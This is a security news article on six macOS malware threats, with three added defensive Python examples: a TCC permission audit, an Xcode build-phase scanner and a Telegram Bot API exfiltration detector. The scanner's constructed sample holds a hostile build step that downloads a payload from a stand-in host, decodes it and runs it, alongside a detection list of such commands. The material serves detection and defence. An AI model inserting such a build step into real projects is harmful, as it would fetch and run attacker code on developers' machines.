Top macOS Malware Threats: Here Are 6 to Watch
Apple's growing market share — in a shrinking PC market — and the increasing use of cross-platform languages such as Golang for malware development are driving a gradual rise in malicious tools targeting macOS environments.
June 1, 2023
![Software Update page in the System Preferences on a MacBook Air laptop computer.](https://eu-images.contentstack.com/v3/assets/blt6d90778a997de1cd/blt63a6f535cb480432/64f176a993e5e1a078b14bd3/macmalware_Tada_Images_shutterstock.jpg?width=700&auto=webp&quality=80&disable=upscale)
Source: Tada Images via Shutterstock
Since at least December 2022, North Korea's BlueNoroff threat actor, a subgroup of the broader Lazarus group, has been using malware dubbed RustBucket in financially motivated attacks against targeted organizations worldwide. The malware marks the group's first known foray into macOS and is an example of how attackers increasingly use cross-platform languages, in this case Rust, from which RustBucket takes its name, to build attack tools for multiple platforms.
Researchers from Jamf Threat Labs reported on the malware in April 2023 after observing BlueNoroff using it to drop and execute various payloads on victim systems. The malware's first stage is a trojanized but fully functional PDF viewer that reaches out to a remote command-and-control (C2) server and installs a separate second-stage payload, which gathers specific information from the victim system and relays it back to the attacker.
Jaron Bradley, senior manager of macOS detections at Jamf, says the sophistication lies not only in the malware itself but in the social engineering tactics the attackers use to get onto victim systems. "This malware campaign targets Windows as well," Bradley says. "But the fact that the attackers have gone out of their way to include a macOS version of the malware tells us that … they have likely hit roadblocks in the past … on the macOS platform."
After tormenting organizations running Windows systems for more than two years, the operators of the LockBit ransomware family began building a macOS version in November 2022. In doing so, they became the first major ransomware gang to attempt to breach Apple's famed walled garden and wreak the same havoc there as they have in Windows environments. Researchers from SentinelOne and other security vendors that inspected the malware found the sample built for Apple silicon, that is, M1- and M2-based Macs (arm64).
So far at least, there have been no reported instances of the Mac version of LockBit in the wild, nor any known victims. However, early reports that the Mac version was non-functional are incorrect, according to SentinelOne. Though the sample the vendor inspected appeared to be still in development, it contained functions for encrypting data on macOS systems and appeared to be a "direct descendant of the LockBit for Linux variant first spotted in Jan 2022," SentinelOne said.
"Despite the underdeveloped nature of the samples, it is clear that the authors are experimenting with similar functionality seen in lockers for other platforms," SentinelOne observed. "The malware is intended to be executed by a human operator or configuration file and offers a number of different encryption options."
Though older than most current macOS malware, XCSSET remains one of the most dangerous threats to Mac users of recent years. Trend Micro discovered XCSSET in 2020 while investigating a security incident involving Xcode developer projects. At the time, Trend Micro found the malware exploiting two zero-day vulnerabilities: one to steal Safari browser cookies and the other to install a development version of Safari on victim systems. Trend Micro's analysis showed the malware spreading via Xcode projects and applications that it had maliciously modified.
About a year after Trend Micro's disclosure, researchers from Jamf found the malware also exploiting a zero-day that bypasses Apple's Transparency, Consent, and Control (TCC) framework, bringing the number of zero-days it abused to three, in order to execute a variety of malicious actions on compromised systems.
XCSSET can read and dump data from Safari browsers; inject JavaScript backdoors into websites; steal information from the victim's Skype, Telegram, WeChat, Notes, and other apps; take screenshots; encrypt files; and exfiltrate data to attacker-controlled systems.
Bradley from Jamf says one notable aspect of the malware is its exploitation of three separate vulnerabilities, all zero-days at the time of discovery: one grants full disk access without the user's explicit permission, one grants screen recording permission without the user's explicit permission, and one dumps protected Safari browser cookies and enables other malicious browser manipulation.
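The two permissions XCSSET obtained without consent, Full Disk Access and Screen Recording, are recorded as TCC grants, so one practical check is to list who currently holds them. The script below is an added example, not code from the article or from Jamf. It reads the per-user TCC database at ~/Library/Application Support/com.apple.TCC/TCC.db (the system-wide one lives under /Library); reading either requires the terminal running it to hold Full Disk Access itself. The column names (service, client, client_type, auth_value) and the auth_value meanings follow the macOS 11+ schema as the editor understands it, which is an assumption; the expected-client list is a placeholder to maintain per fleet. When the real database is unreadable it falls back to a constructed in-memory copy so it runs anywhere.

```python
"""Audit TCC grants for the services XCSSET abused (Full Disk Access, Screen Recording).

Added example, not code from the article or Jamf. Schema and auth_value meanings are
assumed from the macOS 11+ TCC.db layout; the sample database is constructed.
"""
import sqlite3
from pathlib import Path
from urllib.parse import quote

# TCC service identifiers as stored in the database
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceScreenCapture": "Screen Recording",
    "kTCCServiceAccessibility": "Accessibility",
}
ALLOWED = 2  # auth_value: 0 denied, 1 unknown, 2 allowed, 3 limited (assumption)
# Clients expected to hold such grants on this fleet (placeholder; maintain per environment)
EXPECTED_CLIENTS = {"com.apple.Terminal", "us.zoom.xos"}


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample with the 'access' columns the audit needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, auth_reason INTEGER, last_modified INTEGER)"
    )
    rows = [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, 1685000000),
        ("kTCCServiceScreenCapture", "us.zoom.xos", 0, 2, 2, 1685000100),
        # an unfamiliar bundle granted FDA, and a bare path granted screen recording
        ("kTCCServiceSystemPolicyAllFiles", "com.example.updater", 0, 2, 2, 1685000200),
        ("kTCCServiceScreenCapture", "/Users/dev/.local/helper", 1, 2, 2, 1685000201),
        # denied and unrelated entries must not be reported
        ("kTCCServiceScreenCapture", "com.example.denied", 0, 0, 2, 1685000300),
        ("kTCCServiceCamera", "com.example.updater", 0, 2, 2, 1685000400),
    ]
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", rows)
    return conn


def open_tcc_db(path: Path) -> sqlite3.Connection:
    # Read-only URI open so the audit can never modify the live database
    return sqlite3.connect(f"file:{quote(str(path))}?mode=ro", uri=True)


def audit_tcc(conn: sqlite3.Connection, expected=EXPECTED_CLIENTS) -> list[dict]:
    """Allowed grants for sensitive services held by clients outside the expected set."""
    placeholders = ",".join("?" * len(SENSITIVE_SERVICES))
    rows = conn.execute(
        f"SELECT service, client, client_type, auth_value FROM access "
        f"WHERE service IN ({placeholders}) AND auth_value = ?",
        (*SENSITIVE_SERVICES, ALLOWED),
    )
    findings = []
    for service, client, client_type, _ in rows:
        if client in expected:
            continue
        findings.append({
            "service": SENSITIVE_SERVICES[service],
            "client": client,
            # client_type 0 = bundle identifier, 1 = absolute path (typical for unsigned tools)
            "client_kind": "bundle" if client_type == 0 else "path",
        })
    return findings


if __name__ == "__main__":
    user_db = Path.home() / "Library/Application Support/com.apple.TCC/TCC.db"
    try:
        conn = open_tcc_db(user_db)
        conn.execute("SELECT 1 FROM access LIMIT 1")  # fails without Full Disk Access
    except (OSError, sqlite3.Error):
        print("# real TCC.db not readable here; using the constructed sample")
        conn = build_sample_db()
    for f in audit_tcc(conn):
        print(f"{f['service']:<18} {f['client_kind']:<6} {f['client']}")
```

A finding only means a grant exists. Before acting on it, check the binary behind the client with `codesign -dv` and compare it to the code-signing requirement TCC stored alongside the row, which this check does not evaluate.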
"Another unique thing about this malware was the way in which it spread through shared Xcode projects," Bradley notes. "If one of these Xcode projects was downloaded and built by a developer, the other projects on their system would then also be infected, thus leading to worm-like activity and potentially even affecting the supply chain if landing on the right developer system."
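A check for the Xcode project vector Bradley describes, added here as an example and not code from the article, Trend Micro, or Jamf. It assumes XCSSET-style tampering shows up as an extra shell-script build phase (a "Run Script" step, stored as a PBXShellScriptBuildPhase object in project.pbxproj) that Xcode executes at build time with the developer's privileges; that assumption, and the list of indicators, are the editor's. project.pbxproj is an old-style plist, and the script uses regular expressions over the shell-script objects rather than a full parser. The sample project text is constructed; pointed at a directory, it walks every .xcodeproj underneath it, which is the useful mode given the worm-like spread across a developer's other projects.

```python
"""Scan Xcode projects for injected Run Script build phases.

Added example; not code from the article, Trend Micro, or Jamf. Assumes tampering is
visible as a PBXShellScriptBuildPhase whose script fetches, decodes or runs things a
build step should not. The sample pbxproj text is constructed.
"""
import re
import sys
from pathlib import Path

# Indicators a legitimate Run Script step rarely needs (heuristic; tune per code base)
SUSPICIOUS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "applescript": re.compile(r"\bosascript\b"),
    "decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "hidden_path": re.compile(r"(^|/)\.[A-Za-z0-9_]+/"),
    "interpreter_oneliner": re.compile(r"\b(python3?|perl|ruby)\s+-[ec]\b"),
    "eval": re.compile(r"\beval\b"),
}

SECTION_RE = re.compile(
    r"/\* Begin PBXShellScriptBuildPhase section \*/(.*?)/\* End PBXShellScriptBuildPhase section \*/",
    re.S,
)
# "<24 hex chars> /* name */ = {" starts each object; the comment is optional
OBJ_START_RE = re.compile(r"(?P<id>[0-9A-F]{24})\s*(?:/\*\s*(?P<name>[^*]*?)\s*\*/)?\s*=\s*\{")
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"(?P<script>(?:\\.|[^"\\])*)"\s*;', re.S)


def _unescape(s: str) -> str:
    # pbxproj strings escape newlines, tabs, quotes and backslashes with a backslash
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def find_script_phases(pbxproj_text: str) -> list[dict]:
    """Return every shell-script build phase with the indicators its script matches."""
    sections = SECTION_RE.findall(pbxproj_text) or [pbxproj_text]  # fall back if markers are missing
    phases = []
    for sec in sections:
        starts = list(OBJ_START_RE.finditer(sec))
        for i, m in enumerate(starts):
            end = starts[i + 1].start() if i + 1 < len(starts) else len(sec)
            body = sec[m.end():end]
            if "isa = PBXShellScriptBuildPhase;" not in body:
                continue
            sm = SCRIPT_RE.search(body)
            script = _unescape(sm.group("script")) if sm else ""
            hits = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(script))
            phases.append({"id": m.group("id"), "name": m.group("name") or "", "script": script, "hits": hits})
    return phases


def suspicious_phases(pbxproj_text: str) -> list[dict]:
    return [p for p in find_script_phases(pbxproj_text) if p["hits"]]


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Walk a directory (e.g. ~/Developer) and report suspicious phases per project."""
    results = {}
    for pbx in root.rglob("*.xcodeproj/project.pbxproj"):
        try:
            text = pbx.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = suspicious_phases(text)
        if hits:
            results[str(pbx)] = hits
    return results


# Constructed project file: one benign lint step and one injected downloader step
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    archiveVersion = 1;
    objectVersion = 56;
    objects = {
/* Begin PBXShellScriptBuildPhase section */
        3F1A0B2C4D5E6F7081920A1B /* Run SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run SwiftLint";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        A1B2C3D4E5F60718293A4B5C /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "ShellScript";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s http://example.invalid/s -o /tmp/.cache/s && base64 -D /tmp/.cache/s | osascript\n";
        };
/* End PBXShellScriptBuildPhase section */
    };
    rootObject = 0123456789ABCDEF01234567 /* Project object */;
}
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(Path(sys.argv[1]))
    else:
        results = {"<constructed sample>": suspicious_phases(SAMPLE_PBXPROJ)}
    for project, phases in results.items():
        for p in phases:
            print(f"{project}: phase {p['id']} ({p['name']!r}) matched {', '.join(p['hits'])}")
```

Run it over the directory where cloned projects land before building anything from an untrusted source; a hit is a reason to read the script text, not a verdict, since legitimate steps occasionally download tooling.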
In August 2022, SentinelOne reported finding a new XCSSET variant that spread via a fake Mail app and a fake Notes app instead of via Xcode projects as it did initially.
The Atomic macOS Stealer (AMOS), or simply Atomic Stealer, is another threat Mac users need to watch. AMOS is among the most recent of several information stealers targeting macOS that have surfaced over the past year.
According to Trellix researchers Mekala Manoj Reddy and Alfred Alvarado, the malware is sold to cybercriminals under a malware-as-a-service (MaaS) model via criminal forums and a dedicated Telegram channel. It retails for $1,000 per month, according to SentinelOne, which reported on the threat in May. For that price, buyers get access to a web panel and a disk image (DMG)-based installer for launching and managing attacks.
From a functionality standpoint, AMOS is not very different from other macOS information stealers. SentinelOne's analysis showed it capable of stealing passwords, session cookies, browser data, autofill entries, and crypto wallets such as Electrum, Binance, and Exodus. Other macOS stealers such as Pureland and MacStealer offer similar capabilities, but Atomic Stealer's developers offer "by far the most complete package, promising cybercriminals a full featured if not particularly sophisticated infostealer," according to SentinelOne.
MacStealer is malware that can steal credentials, cookies, credit card data, and other sensitive information from the Firefox, Brave, and Google Chrome browsers on both Intel-based and Apple silicon (M1 and M2) Macs.
The malware affects all macOS versions from Catalina onward. Researchers from Uptycs, who discovered the threat earlier this year, describe MacStealer as capable of extracting a wide range of files from compromised systems, including .txt, .doc, .pdf, .xls, .ppt, and .zip files.
MacStealer is the macOS representative of a rapidly growing number of malware families that use the Telegram messaging platform for command and control (C2). Its authors distribute it under a malware-as-a-service (MaaS) model, and according to Uptycs the developer has a mass production order for MacStealer from other threat actors.
"Thus, the malware is likely to be spread more widely," Uptycs has warned.
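Because MacStealer pushes what it collects through Telegram, the Bot API endpoint is a useful place to look in network telemetry. The detection below is an added example, not code from the article or from Uptycs. It assumes proxy or EDR network records exported as JSON lines with user, process, host, path, and bytes_out fields (a constructed format), and relies only on the public shape of Telegram's Bot API URLs, https://api.telegram.org/bot<token>/<method>, where the token is a numeric bot id, a colon, and a secret. The official Telegram desktop client does not speak the Bot API, so Bot API calls from an end-user machine deserve a look regardless of process name; the allowlist of sanctioned processes is a placeholder. The sample log lines are constructed.

```python
"""Flag Telegram Bot API traffic from endpoints as a candidate infostealer exfil channel.

Added example, not from the article or Uptycs. The log format is constructed; the Bot
API URL shape is Telegram's public API. The allowlist is a placeholder to tune per fleet.
"""
import json
import re
from collections import defaultdict

# Bot tokens are "<numeric bot id>:<secret>"; only the id is kept in findings
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)")
# Methods a stealer needs in order to push data into an attacker-owned chat
UPLOAD_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}
LARGE_UPLOAD_BYTES = 1_000_000
# Processes sanctioned to talk to the Bot API, e.g. an alerting tool (placeholder)
ALLOWLISTED_PROCESSES = {"alertmanager"}

# Constructed telemetry: normal browsing, a sanctioned alert bot, an unknown helper
# uploading a 3 MB document, and the real Telegram client talking to its own backend.
SAMPLE_LOG = """\
{"ts":"2023-05-02T10:00:01Z","user":"dev1","process":"Safari","method":"GET","host":"www.example.com","path":"/","bytes_out":512}
{"ts":"2023-05-02T10:00:07Z","user":"dev1","process":"alertmanager","method":"POST","host":"api.telegram.org","path":"/bot123456789:AAF3cAbCdEfGhIjKlMnOpQrStUvWxYz0123/sendMessage","bytes_out":240}
{"ts":"2023-05-02T10:02:13Z","user":"dev2","process":"update_helper","method":"POST","host":"api.telegram.org","path":"/bot987654321:AAEzyxwvutsrqponmlkjihgfedcba987654/sendDocument","bytes_out":3145728}
{"ts":"2023-05-02T10:02:14Z","user":"dev2","process":"update_helper","method":"POST","host":"api.telegram.org","path":"/bot987654321:AAEzyxwvutsrqponmlkjihgfedcba987654/sendMessage","bytes_out":180}
{"ts":"2023-05-02T10:05:00Z","user":"dev3","process":"Telegram","method":"POST","host":"telegram-dc.example","path":"/api","bytes_out":2048}
"""


def parse_events(log_text: str):
    for line in log_text.splitlines():
        if line.strip():
            yield json.loads(line)


def detect_bot_api_exfil(log_text: str, allowlist=ALLOWLISTED_PROCESSES) -> list[dict]:
    """Group Bot API calls by (user, process, bot id) and return the non-allowlisted groups."""
    groups = defaultdict(lambda: {"calls": 0, "bytes_out": 0, "methods": set()})
    for ev in parse_events(log_text):
        if ev.get("host") != "api.telegram.org":
            continue
        m = BOT_PATH_RE.match(ev.get("path", ""))
        if not m:
            continue
        bot_id = m.group("token").split(":", 1)[0]
        g = groups[(ev["user"], ev["process"], bot_id)]
        g["calls"] += 1
        g["bytes_out"] += int(ev.get("bytes_out", 0))
        g["methods"].add(m.group("method"))

    findings = []
    for (user, process, bot_id), g in groups.items():
        if process in allowlist:
            continue
        uploads = g["methods"] & UPLOAD_METHODS
        findings.append({
            "user": user,
            "process": process,
            "bot_id": bot_id,  # enough to block or report; the secret half stays out of tickets
            "calls": g["calls"],
            "bytes_out": g["bytes_out"],
            "methods": sorted(g["methods"]),
            # a large upload via a send* method is the exfil pattern; mere Bot API use is medium
            "severity": "high" if uploads and g["bytes_out"] >= LARGE_UPLOAD_BYTES else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_bot_api_exfil(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['user']} {f['process']} -> bot {f['bot_id']}: "
              f"{f['calls']} calls, {f['bytes_out']} bytes out, methods={f['methods']}")
```

Grouping by bot id rather than by single request matters: the bot id ties multiple victims to one attacker bot, and keeping the secret half out of findings avoids copying a working credential into ticketing systems.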
The macOS version of the malware that shipped in digitally signed updates from video-conferencing software maker 3CX earlier this year is one of the bigger current threats to macOS environments.
A subgroup of North Korea's Lazarus advanced persistent threat (APT) operation inserted the malware into installers for the Windows and macOS versions of 3CX's Electron desktop app after gaining access to the company's build environment with stolen credentials. The attackers used the weaponized Windows versions of the app to download additional malware onto compromised systems, including a multifunctional backdoor dubbed "Gopuram" capable of, among other things, starting, stopping, and deleting services.
Patrick Wardle, founder of the Objective-See Foundation, analyzed the macOS version and found its first-stage payload functionally similar to the weaponized Windows version. Upon installation, the trojanized macOS 3CX app pulled down a second-stage payload named "UpdateAgent" from an attacker-controlled command-and-control server. Wardle found that UpdateAgent included functionality for stealing sensitive account and system information from compromised Macs and sending it to a remote server.
According to Wardle, "each time the first-stage payload was run, it would (re)download and (re)execute UpdateAgent … meaning, at any time, the Lazarus group hackers could, for targets of interest, update/swap out the UpdateAgent's code, perhaps for a persistent, fully featured implant."